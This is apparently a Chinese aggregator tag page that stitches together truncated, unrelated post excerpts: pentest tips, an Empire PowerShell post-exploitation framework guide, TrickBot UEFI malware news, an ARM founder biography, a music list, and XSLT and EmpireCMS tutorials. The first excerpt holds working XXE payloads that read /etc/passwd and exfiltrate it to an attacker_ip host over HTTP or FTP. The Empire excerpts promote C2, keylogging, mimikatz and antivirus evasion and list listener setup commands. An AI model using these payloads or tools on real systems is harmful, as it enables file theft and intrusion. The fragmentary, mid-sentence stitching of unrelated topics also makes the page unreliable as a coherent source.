empire

渗透测试人员注意!这几个小TIPS能帮你

Deadly 提交于 2021-02-18 16:41:24
扫码领资料 获黑客教程 免费&进群 转乌云安全 这里 记录渗透测试中常见的小Tips。 关于XXE漏洞的一些总结 XXE Payload: <?xml version="1.0"?> <!DOCTYPE foo SYSTEM "http://attacker_ip:port/xxe.dtd"> <foo>&e1;</foo> xxe.dtd: File Exfiltration over HTTP: <!ENTITY % p1 SYSTEM "file:///etc/passwd"> <!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://attacker_ip:port/res?%p1;'>"> %p2; File Exfiltration over FTP: <!ENTITY % p1 SYSTEM "file:///etc/passwd"> <!ENTITY % p2 "<!ENTITY e1 SYSTEM 'ftp://attacker_ip:port/%p1;'>"> %p2; 利用工具: xxe-ftp-server.rb XXEinjector XXESERV – A mini webserver with FTP support for XXE payloads OXML_XXE – A tool for embedding XXE

Empire – PowerShell 后渗透攻击框架

别说谁变了你拦得住时间么 提交于 2021-02-15 09:34:55
0x01 简介 Empire是一个后渗透攻击框架。它是一个纯粹的PowerShell代理,具有加密安全通信和灵活架构的附加功能。Empire具有在不需要PowerShell.exe的情况下执行PowerShell代理的方法。它可以迅速采用可后期利用的模块,涵盖范围广泛,从键盘记录器到mimikatz等。这个框架是PowerShell Empire和Python Empire项目的组合; 这使得它用户友好和方便。PowerShell Empire于2015年问世,Python Empire于2016年问世。它类似于Metasploit和Meterpreter。但由于它是命令和控制工具,它允许您更有效地控制PC。 PowerShell提供了丰富的攻击性优势,进一步包括.NET的全部访问,applock白名单以及对Win32的直接访问。它还在内存中构建恶意二进制文件。它提供C2功能,允许您在第一阶段之后植入第二阶段。它也可以用于横向移动。它与其他框架相比发展迅速,且非常方便。此外,由于它不需要PowerShell.exe,它可以让您绕过反病毒。因此,最好使用PowerShell Empire。 0x02 功能 listenter:监听器是一个从我们正在攻击的机器上侦听连接的进程。这有助于Empire将战利品发回攻击者的计算机。 Stager: stager是一段代码

PowerShell渗透--Empire

依然范特西╮ 提交于 2021-02-15 07:33:56
0x00 简介 Empire是一款针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透攻击框架代码具有从stager生成,提权到渗透维持的一系列功能,无需powershell.exe就可以使用powershell的代理功能还可以快速在后期部署漏洞利用模块,内置模块有键盘记录,Mimikatz,绕过UAC,内网扫描等,可以躲避网络检测和大部分安全防护工具,类似于Meterpreter,是一个基于PowerShell的远控木马( www.powershellempire.com ) 0x02 安装 git clone https://github.com/EmpireProject/Empire.git 0x03 使用 help 查看帮助 设置监听 listeners #进入监听线程界面 uselistener #设置监听模式 info #查看具体参数设置 set #设置相应参数 execute #开始监听 uselistener 用来设置监听模式 uselistener <tab> <tab> 查看可以使用的监听模式 uselistener http 采用http监听模式,输入info 查看具体参数设置 Required 为 true 的参数都是需要设置的 set Name Micr067 #设置任务名称 set Host 192.168.190.133 #

小心!基于UEFI引导的病毒,重装系统也清除不了

孤者浪人 提交于 2020-12-05 11:08:13
TrickBot是世界上最臭名昭著且适应性最强的恶意软件,它正在扩展其工具集,以将目光投向固件漏洞,以潜在地部署Bootkit并完全控制受感染的系统。 它利用易于使用的工具来检查设备是否存在众所周知的漏洞,这些漏洞可能使攻击者将恶意代码注入设备的UEFI / BIOS固件中,攻击者持久存储恶意软件的有效机制,从而重装系统也清除不了。 国际知名白帽黑客、东方联盟创始人郭盛华透露:“这标志着TrickBot的发展迈出了重要的一步,因为UEFI级植入物是最深,最强大,最隐蔽的形式。通过增加针对特定UEFI / BIOS固件漏洞的受害设备的功能,TrickBot恶意软件能够以固件级别的持久性来针对特定的受害者,这种持久性可以在重装系统,甚至设备绑定功能中幸存。” UEFI是固件接口,是BIOS的替代品,可提高安全性,确保没有恶意软件破坏启动过程。因为UEFI有助于加载操作系统本身,所以这种感染可以抵抗OS重新安装或更换硬盘驱动器。 TrickBot于2016年以银行木马的身份出现,但后来演变为一种多功能的恶意软件即服务(MaaS),该恶意软件利用其他旨在窃取凭据,电子邮件,财务数据和传播文件加密勒索软件的恶意负载感染系统例如Conti和Ryuk。 郭盛华透露:“他们最常见的攻击链主要是从垃圾邮件活动开始的,然后再加载TrickBot和/或其他加载程序,然后转移到诸如PowerShell

ARM 创始人的传奇人生

夙愿已清 提交于 2020-10-06 12:22:14
作者 | 老石 来源 | 老石谈芯 很多世界顶尖的“建筑师”可能是你从未听说过的人,他们设计并创造出了很多你可能从未见过的神奇结构,比如在芯片内部源于沙子的复杂体系。如果你使用手机、电脑,或者通过互联网收发信息,那么你就无时无刻不在受益于这些建筑师们的伟大工作。 赫曼·豪瑟(Hermann Hauser)就是这些“建筑师”里的一员。可以说,现年72岁的赫曼·豪瑟是个标准的“斜杠人士”: - 他出生于奥地利的维也纳,随后来到英国开始了自己的职业生涯。 - 他拥有剑桥大学卡文迪许实验室的物理学博士学位,后来却在计算机领域为世人所熟知。 - 他创办了ARM公司 – 这个英国高科技皇冠上的明珠,也在金融领域有着自己的风险投资基金。 - 他荣誉等身,是英国两院院士,有着英国皇家的荣誉骑士爵位,同时也是身家高达1.5亿英镑的成功商人。 - 他成功的投资了很多英国的高科技企业,推动了英国剑桥“新硅谷”的形成,同时也是一个慷慨的慈善家,向健康和教育领域捐赠了超过1500万英镑。 可以说,赫曼·豪瑟的一生,就是一路开挂,不断走向更高人生巅峰的典型例子。在英国和欧洲,他常常被拿来和同时期的史蒂夫·乔布斯相比。和乔布斯一样,豪瑟也有自己标志性的造型:一头银发、黝黑的皮肤、海军蓝西装、米色羊毛衫,以及圆点围巾。 最近,赫曼·豪瑟再次被推向舆论的风口浪尖。起因就是英伟达对ARM的这场400亿美元的世纪收购

如果感觉没有动力或是心情很失落,那就听听战歌吧!(可免费下载)

帅比萌擦擦* 提交于 2020-08-16 17:27:12
世上没有过不去的坎,如果有,那就听听战歌吧,如果还有,那就再听一遍! 每一项挑战都有它的倒计时,无论你愿不愿意,时间都会推着你先前走,你可以原地休息,也可以起来奔跑,休息舒服,奔跑很累,奔跑的人已经浴火重生、登峰造极,到达终点只是时间的问题,而休息的人依然在原地。 1、 Victory 2、 EI Dorado 3、 Star Sky 4、 For The Win 5、 Empire Of Angels 6、 Dragon Rider 7、 Jump! 这些BGM都是由一家名叫Two Steps From Hell(地狱咫尺)音乐制作公司制作完成,由Nick Phoenix和Thomas J. Bergersen于2006年3月在美国洛杉矶成立,公司主要制作用于电影预告片的音乐,作品风格以史诗、气势、新世纪、古典为主。 感谢酷狗音乐提供平台 来源: oschina 链接: https://my.oschina.net/u/4258176/blog/4497881

XSLT-客户端

女生的网名这么多〃 提交于 2020-08-13 17:18:40
XSLT 是一种用于将 XML 文档转换为 XHTML 文档或其他 XML 文档的语言。XPath 是一种用于在 XML 文档中进行导航的语言。 JavaScript 解决方案 在前面的章节,我们已向您讲解如何使用 XSLT 将某个 XML 文档转换为 XHTML。我们是通过以下途径完成这个工作的:向 XML 文件添加 XSL 样式表,并通过浏览器完成转换。 即使这种方法的效果很好,在 XML 文件中包含样式表引用也不总是令人满意的(例如,在无法识别 XSLT 的浏览器这种方法就无法奏效)。 更通用的方法是使用 JavaScript 来完成转换。 通过使用 JavaScript,我们可以: • 进行浏览器确认测试 • 根据浏览器和用户需求来使用不同的样式表 这就是 XSLT 的魅力所在!XSLT 的设计目的之一就是使数据从一种格式转换到另一种格式成为可能,同时支持不同类型的浏览器以及不同的用户需求。 客户端的 XSLT 转换一定会成为未来浏览器所执行的主要任务之一,同时我们也会看到其在特定的浏览器市场的增长(盲文、听觉浏览器、网络打印机,手持设备,等等)。 XML 文件和 XSL 文件 请看这个在前面的章节已展示过的 XML 文档: <?xml version="1.0" encoding="UTF-8"?> <catalog> <cd> <title>Empire

从没想过从上帝视角看地球,竟美得如此震撼!

谁说胖子不能爱 提交于 2020-08-11 22:49:38
全世界只有 3.14 % 的人关注了 爆炸吧知识 “ 当你从另一个角度俯瞰地球,你就能发现不一样的世界 。。。 试想你现在飘起来了 飘得越来越高,地球在你眼里慢慢变小 现在,你看见的是此生从未见过的景色 ——《极简宇宙史》 当想象力带我走向未知 脑海中全是肆意描绘的绚烂画面 一面希望保有自由想象的空间 一面又压抑不住好奇心去认知宇宙真正的模样 进行一次离开地球的旅行短期内怕是无法实行 只能在搭乘飞机时到达远离地表的最高高度 从“上帝视角”一窥所生活的星球 我们中的大多数人 可能一生都没有机会 站上太空俯瞰我们赖以生存的地球 而那些有机会从另一个视角 看我们家园的人则认为 这一看,打破了自己很多原先的认知 我们知道世界很大、地球很美 但人类真是太渺小了! 这种美总是无法完整确切地体验的 除非你从一万里的高空 以一种上帝视角俯瞰我们所居住的星球 这种感受在1987年被作家 Frank White 定义为 “ Overview Effect 总观效应 ” 来自纽约的作家 本杰明•格兰特( Benjamin Grant ) 从总观效应中得到灵感 搜集网络上的卫星图像资料 创立了一个名为 Daily Overview 每日总观的网站 (文末附网址) 和Instagram账号 让人可以从空中角度 看一看熟悉的城市和未曾见过的自然 自2013年12月开始 他的Instagram账号(Daily

dede 转 帝国

 ̄綄美尐妖づ 提交于 2020-08-11 02:46:38
1.转换栏目 insert into ak_enewsclass (classid,bclassid,classname,myorder,classpath,intro,classpagekey) select id,reid,typename,sortrank,typedir,description,keywords from dede_arctype; update ak_enewsclass set tbname='news', modid='1',lencord=23; update ak_enewsclass set islist=1,listtempid=1,dtlisttempid=1,newstempid=1,classtype='.html',filetype='.html';    2.更新栏目featerclass字段 <?php require ('e/class/connect.php'); //引入数据库配置文件和公共函数文件 require ('e/class/db_sql.php'); //引入数据库操作文件 $link = db_connect(); //连接MYSQL $empire = new mysqlquery(); //声明数据库操作类 $sql = $empire ->query("select classid,bclassid

帝国cms 加载更多的实现(父栏目以及子栏目都可以实现)

扶醉桌前 提交于 2020-08-07 03:10:03
1、 < div class ="pagelist" > < span id ="loadmore" class ="btn" style ="display: block;" > 加载更多 </ span > </ div > 找到加载更多的按钮,设置好id(最好用id,比较容易遍历)。 2、 < ul id ="showajaxnews" style ="opacity: 1; top: 0px;" > [!--empirenews.listtemp--] <!-- list.var1 --> [!--empirenews.listtemp--] </ ul > 找到列表内容模板的标签,也设置好id。 3、 <script> $( function () { var i = 1 ; $( '#loadmore').click( function () { $.ajax({ url: '域名/e/action/getmore.php' , type: 'POST' , data: { "next" : i, 'table': 'news' , 'classid': '[!--self.classid--]' , /*这个标签获取的当前id*/ 'action': 'getmorenews' , 'limit': 4 , 'small_length': 120 },